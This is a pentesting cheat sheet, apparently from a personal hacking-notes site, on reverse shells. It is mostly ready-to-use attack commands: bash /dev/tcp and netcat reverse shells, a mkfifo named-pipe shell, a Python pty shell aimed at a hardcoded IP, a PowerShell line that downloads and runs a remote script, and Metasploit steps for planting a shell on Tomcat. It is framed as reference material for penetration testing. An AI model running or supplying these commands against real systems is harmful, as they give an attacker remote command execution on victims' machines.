Reverse shell

When a victim (client) connects to a server (hacker), we gain access to what we call a 'reverse shell,' allowing us to run commands on the victim and maybe compromise it.

The 'reverse' comes from the fact that the target is the one connecting to use, while with ssh or other remote tools, the client is 'normally' the one initiating the connection. 💥

The hacker will run a listener on their machine and wait for the compromised target to connect back to it, e.g. wait for the target to execute the reverse shell payload 🪲.

You will have to configure the selected reverse shell that you will use to connect back to the listener. For the commands below, we consider the host with the listener IP to be x.y.z.t; port 4444 .

If your target is missing a binary, you may be able to download a precompiled version on andrew-d GitHub (2.8k ⭐, 2020 🪦).

For the listener, you can use tools listed in Remote Shell or a simple instable netcat listener listening on the selected port:

$ nc -lvnp 4444 # await the reverse shell payload execution

Revshells website

revshells is a popular website to create reverse shell payloads, along with generating listener commands.

Example: "Bash" client

$ sh -i >& /dev/tcp/x.y.z.t/4444 0>&1

Example: "nc.exe -e" client

PS> nc.exe x.y.z.t 4444 -e sh

➡️ Select one based on what command you can run on the target.

Other alternatives are:

revshellgen (0.4k ⭐, script)
ShellPop (1.4k ⭐, script, 2018/2019)

PHP reverse shell

You could check out this script by pentestmonkey (1.4k ⭐, 2015). This is a well-known reference.

On Kali Linux, there is local copy in /usr/share/webshells/php/.

$ cp /usr/share/webshells/php/php-reverse-shell.php /tmp/revshell.php
$ sed -i 's/127.0.0.1/x.y.z.t/' /tmp/revshell.php
$ sed -i 's/1234/4444/' /tmp/revshell.php

netcat client

The most common usage is:

$ nc -c /bin/bash x.y.z.t 4444

Netcat option -e is often not available due to security measures.

$ nc x.y.z.t 4444 -e /bin/bash

Linux targets

TCP socket

$ /bin/bash -i >& /dev/tcp/x.y.z.t/4444 0>&1

Named pipe

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc x.y.z.t 4444 >/tmp/f

Windows targets

You can try ConPtyShell (0.7k ⭐).

PS> IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing)
PS> Invoke-ConPtyShell x.y.z.t 4444

$ curl http://$IP:$PORT/revshell.php -o /dev/shm/revshell.php
$ php /dev/shm/revshell.php
$ export RHOST="10.9.168.80";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

You can try powercat (1.8k ⭐, powershell netcat client/server)

Tomcat Reverse Shell

You can use metasploit to both generate a shell and upload it. It doesn't work with at least tomcat 7.8.

$ msfconsole -q
msf6> use exploit/multi/http/tomcat_mgr_upload
msf6> set RHOSTS <target>
msf6> set RPORT 8080
msf6> set HttpUsername username
msf6> set HttpPassword password
msf6> set LHOST tun0
msf6> set VERBOSE true # error 500 == it won't work
msf6> run

You can use msfvenom to generate a reverse shell.

You can also create one manually. For the contents of index.jsp, you can use metasploit one or this one which is similar.

$ nano index.jsp # fill this file
$ jar -cvf ../revshell.war index.jsp  # it works in v7
$ zip -r revshell.war index.jsp       # it works in v7

👻 To-do 👻

Stuff that I found, but never read/used yet.

Python/Mkfifo shells are often more likely to work
Try double reverse shell?
r57shell

Reverse shell ¶

Revshells website ¶

PHP reverse shell ¶

netcat client ¶

Linux targets ¶

TCP socket ¶

Named pipe ¶

Windows targets ¶

Tomcat Reverse Shell ¶

👻 To-do 👻 ¶